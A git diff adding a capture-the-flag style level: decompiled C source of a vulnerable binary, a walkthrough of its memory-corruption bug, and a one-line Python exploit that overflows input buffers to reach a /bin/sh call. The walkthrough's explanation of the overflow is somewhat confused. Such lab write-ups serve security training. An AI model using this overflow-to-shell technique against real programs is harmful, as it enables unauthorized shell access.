diff --git a/level8/ressources/exploit b/level8/ressources/exploit
new file mode 100644
index 0000000..eca80e9
--- /dev/null
+++ b/level8/ressources/exploit
@@ -0,0 +1 @@
+(python -c 'print "auth \nservice" + "A" * 34 + "\n" + "login\n"'; cat) | ./level8
diff --git a/level8/source.c b/level8/source.c
new file mode 100644
index 0000000..44a58da
--- /dev/null
+++ b/level8/source.c
@@ -0,0 +1,36 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+char *auth;
+int service;
+
+int main(void)
+{
+	char s[5];
+	char v5[2];
+	char v6[129];
+
+	while (1) {
+		printf("%p, %p \n", auth, (const void *)service);
+		if (!fgets(s, 128, stdin))
+			break;
+		if (!memcmp(s, "auth ", 5)) {
+			auth = (char *)malloc(4);
+			auth[0] = 0;
+			if (strlen(v5) <= 30)
+				strcpy(auth, v5);
+		}
+		if (!memcmp(s, "reset", 5))
+			free(auth);
+		if (!memcmp(s, "service", 6))
+			service = (int)strdup(v6);
+		if (!memcmp(s, "login", 5)) {
+			if (auth[32])
+				system("/bin/sh");
+			else
+				fwrite("Password:\n", 1, 10, stdout);
+		}
+	}
+	return 0;
+}
diff --git a/level8/walkthrough b/level8/walkthrough
new file mode 100644
index 0000000..7b356c8
--- /dev/null
+++ b/level8/walkthrough
@@ -0,0 +1,13 @@
+# Level8
+
+Using ghidra, we can decompile the code and see that it loops on a `fgets()` and does a bunch of `memcmp()` with its buffer.
+First of all, we have 2 global variables, `char *auth` and `int service`. Also, we have 3 local buffers (`s`, `v5` and `v6`) with respective sizes of 5, 2 and 129.
+We can see that they are being changed in 2 different `if memcmp()`.
+The first one is when we input `"auth "`. It will allocate 4 bytes to `auth`, then set `auth[0]` to 0.
+The second one is when we input `"service"`. It will `strdup()` the content of `v6` (a random buffer on the stack) to `service`. This is interesting because we can overflow the first buffer `s` (through `fgets(s, 128, stdin)`)until we reach `v6`, thus allowing us to write whatever we want to service. Since `service` is an int, it will overflow to the next variable, which is `char *auth`.
+To make this vulnerability useful, let's see the last `memcmp()`. 
+This last `if memcmp()` is triggered with the input `"login"`. It then has an `if/else`, that will open a shell (what we want) in case `auth[32] != 0`.
+Here comes the interesting part, remember we could overflow on `auth` through the `strdup` on `service`.
+
+Here's the full exploit: 
+`(python -c 'print "auth \nservice" + "A" * 34 + "\n" + "login\n"'; cat) | ./level8`